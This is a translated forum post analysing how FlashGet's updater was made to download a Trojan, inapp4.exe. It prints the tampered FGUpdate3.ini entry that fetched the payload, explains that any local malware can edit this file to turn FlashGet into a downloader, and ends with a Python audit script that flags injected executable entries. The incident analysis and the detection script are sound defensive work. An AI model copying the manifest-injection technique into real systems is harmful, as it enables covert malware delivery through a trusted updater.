
The legal trojan is already on your board

This Habr post is food for thought for users of the popular FlashGet download manager. I apologize in advance for the lack of working links; something on Habr seems to be broken.

To hunt for and fight malware I use Symantec products. Just yesterday I ran into a problem: NIS (Norton Internet Security) started raising alerts on FlashGet. I searched the web a bit and here is a summary:
1. Multiple reports in the support forum from users whose antivirus started detecting Trojans in the FlashGet directory.
2. Panic on the FlashGet program forum.
3. The main symptom is the appearance of files with the following names in the system:
inapp4.exe inapp5.exe inapp6.exe
Detected by Kaspersky Anti-Virus as:
Trojan-Dropper.Win32.Agent.exo
Dropper.Win32.Agent.ezo
Trojan-Downloader.Win32.Agent.kht
4. No other Trojan programs through which the above files could have got onto the system were found.
5. The check showed that, besides the Trojans, the FGUpdate3.ini file has a recent creation and modification date. In the original post the lines that differ from the pristine file were highlighted; the highlighting did not survive, but the additions are the inapp4.exe entries:
[Add]
fgres1.ini=1.0.0.1035
FlashGet_LOGO.gif=1.0.0.1020
inapp4.exe=1.0.0.1031

[AddEx]
[fgres1.ini]
url=http://dl.flashget.com/flashget/fgres1.cab
flag=16
path=%product%

[FlashGet_LOGO.gif]
url=http://dl.flashget.com/flashget/FlashGet_LOGO.cab
flag=16
path=%product%

[inapp4.exe]
url=http://dl.flashget.com/flashget/appA.cab
flag=2
path=%product%

The URL for inapp4.exe, which is the Trojan, points at the real FlashGet site: that is where it was downloaded from, packaged as appA.cab.
6. The “vulnerability” exists in all FlashGet 1.9.xx versions. There is no information about the incident on the FlashGet site; complete silence from the developers.
7. Although the compromise of the FlashGet site has been dealt with for now, the weakness in how users are protected remains: the updater trusts a plaintext local ini file for what to fetch over plain HTTP, so any Trojan can modify the local FlashGet ini file and turn FlashGet itself into a Trojan downloader.
8. For those interested, Google knows where the full analysis by Kaspersky Lab specialists is.
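As an added example (not code from this post, from FlashGet, or from Kaspersky), here is a small Python audit of FGUpdate3.ini that does what was done by hand in items 5 and 7: diff the local manifest against a known-good copy to surface injected entries, and flag entries that a tampered manifest would contain. The infected manifest text is copied from the listing above; the "pristine" baseline is an assumption (the same listing with the inapp4.exe entries removed); the meaning of the `flag` values is not documented on the page and the script does not interpret them. The host and executable-suffix lists are likewise the example's own assumptions.

```python
"""Audit a FlashGet FGUpdate3.ini update manifest for injected entries.

Added example, not code from the original post or from FlashGet. The
manifest layout (an [Add] section mapping file name -> version, then one
section per file with url/flag/path keys) is taken from the listing in the
post; the meaning of the 'flag' value is not documented there and is not
interpreted here. BASELINE_INI is a constructed assumption: the post's
listing with the inapp4.exe entries removed.
"""
import configparser
from urllib.parse import urlparse

# Manifest as captured on an infected machine (copied from the post).
INFECTED_INI = """\
[Add]
fgres1.ini=1.0.0.1035
FlashGet_LOGO.gif=1.0.0.1020
inapp4.exe=1.0.0.1031

[AddEx]
[fgres1.ini]
url=http://dl.flashget.com/flashget/fgres1.cab
flag=16
path=%product%
[FlashGet_LOGO.gif]
url=http://dl.flashget.com/flashget/FlashGet_LOGO.cab
flag=16
path=%product%
[inapp4.exe]
url=http://dl.flashget.com/flashget/appA.cab
flag=2
path=%product%
"""

# Constructed baseline: ASSUMED to be the same manifest before tampering.
BASELINE_INI = """\
[Add]
fgres1.ini=1.0.0.1035
FlashGet_LOGO.gif=1.0.0.1020

[AddEx]
[fgres1.ini]
url=http://dl.flashget.com/flashget/fgres1.cab
flag=16
path=%product%
[FlashGet_LOGO.gif]
url=http://dl.flashget.com/flashget/FlashGet_LOGO.cab
flag=16
path=%product%
"""

EXPECTED_HOST = "dl.flashget.com"  # assumption: the only legitimate source
EXECUTABLE_SUFFIXES = (".exe", ".dll", ".scr", ".com", ".bat", ".cmd")


def parse_manifest(text):
    """Return {file_name: {"version": ..., "url": ..., "flag": ..., "path": ...}}."""
    cp = configparser.ConfigParser(interpolation=None)  # keep %product% literal
    cp.optionxform = str  # preserve key case; keys are file names
    cp.read_string(text)
    entries = {}
    for name, version in cp["Add"].items():
        details = dict(cp[name]) if cp.has_section(name) else {}
        entries[name] = {"version": version, **details}
    return entries


def diff_manifest(baseline, current):
    """Entries in `current` that are absent from, or differ from, `baseline`."""
    old, new = parse_manifest(baseline), parse_manifest(current)
    return {name: e for name, e in new.items() if old.get(name) != e}


def audit_manifest(text):
    """Heuristic findings per entry; an empty list means nothing stood out."""
    findings = {}
    for name, e in parse_manifest(text).items():
        issues = []
        url = urlparse(e.get("url", ""))
        if not e.get("url"):
            issues.append("no url for entry")
        elif url.scheme != "https":
            issues.append("fetched over plain HTTP, no transport integrity")
        if e.get("url") and url.hostname != EXPECTED_HOST:
            issues.append(f"unexpected download host {url.hostname!r}")
        if name.lower().endswith(EXECUTABLE_SUFFIXES):
            issues.append("executable payload delivered by the updater")
        findings[name] = issues
    return findings


if __name__ == "__main__":
    for name, entry in diff_manifest(BASELINE_INI, INFECTED_INI).items():
        print(f"injected/changed: {name} -> {entry.get('url')}")
    for name, issues in audit_manifest(INFECTED_INI).items():
        for issue in issues:
            print(f"{name}: {issue}")
```

On the page's data the diff returns only the inapp4.exe entry, and the audit flags it as an executable payload; every entry, including the benign resources, is also flagged for being fetched over plain HTTP, which is the structural weakness item 7 describes. In practice the baseline should be a copy taken from a clean install and stored where the updater's own account cannot write it, otherwise a Trojan that can edit the ini can edit the baseline too.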

P.S. For some reason the links are not being inserted properly.


Source: https://habr.com/ru/post/22116/
